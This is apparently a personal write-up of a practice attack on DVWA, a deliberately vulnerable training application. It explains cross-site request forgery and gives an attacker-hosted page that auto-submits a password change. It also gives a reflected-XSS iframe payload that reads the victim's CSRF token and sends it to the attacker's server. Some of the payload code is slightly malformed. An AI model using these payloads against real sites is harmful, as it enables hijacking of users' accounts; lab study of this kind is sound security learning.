I was training my hacking skills on the DVWA, for the attacks CRSF ( Cross Site Request Forgery ) and I wanted an elegant way to orchestrate my attack.
Brief Explanation of CRSF
To make it simple, a CRSF is an attack consisting in making the victim do a request without their consent. To get the idea, it could be a link redirecting to :
Without any protection from the website, a victim clicking on this link would change their password without noticing. But it is not that easy ( fortunately .. ), that change_password.php page require you to be logged. A way for an hacker to counter this would be to insert some code on the website to redirect you to the page without losing your session cookie ( what keeps you logged on the website ). In that perspective, the hacker needs another exploit to insert some code on the website.
The idea of the iFrames
<iframe type=hidden" id="iframe" src="http://10.6.66.42/dvwa/vulnerabilities/csrf/" onload="window.open('//10.6.66.64/index.php"></iframe>
There are very powerful as an hacking tool, since they can be invisible for the user. Here, the iFrame opens a website we are hosting ( supposing our IP is 10.6.66.64 ). The idea will be to open such an iFrame by exploiting another breach, and calling our own page that will send a form to change the password of the user.
Usually, such an attack requires another weakness. One of the most common exploit that can be used for a CRSF is a XSS. We are going to test our attack on the security high of the DVWA. We need first to prepare our page. We need to send a form to http://10.6.66.42/dvwa/vulnerabilities/csrf/ that requires a user_token. Here is the page we are going to host :
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <title>Exploit</title> <meta name="referrer" content="no-referrer"> <style type="text/css" media="screen"></style> </head> <body > <form method="GET" action="http://10.6.66.42/dvwa/vulnerabilities/csrf/" target="csrf-frame" id="csrf-form"> <input type="hidden" name="password_new" value="password"> <input type="hidden" name="password_conf" value="password"> <input type="hidden" name="user_token" value="<?php echo $_REQUEST['user_moken'];?>"> <input type="hidden" name="Change" value="Change"> </form> <Script>document.getElementById("csrf-form").submit();</Script> </body> </html>
var moken = this.contentDocument.getElementsByName('user_token').value
Putting all together, the idea is to create an iFrame that would request
http://10.6.66.42/dvwa/vulnerabilities/csrf/, collect the token, and send it to our hosted page within the same iFrame. We can exploit the XSS Reflected page to call our iFrame :
<iframe type=hidden" id="iframe" src="http://10.6.66.42/dvwa/vulnerabilities/csrf/" onload=" var moken = this.contentDocument.getElementsByName('user_token').value; window.open('//10.6.66.64/index.php?user_moken='+moken) "></iframe>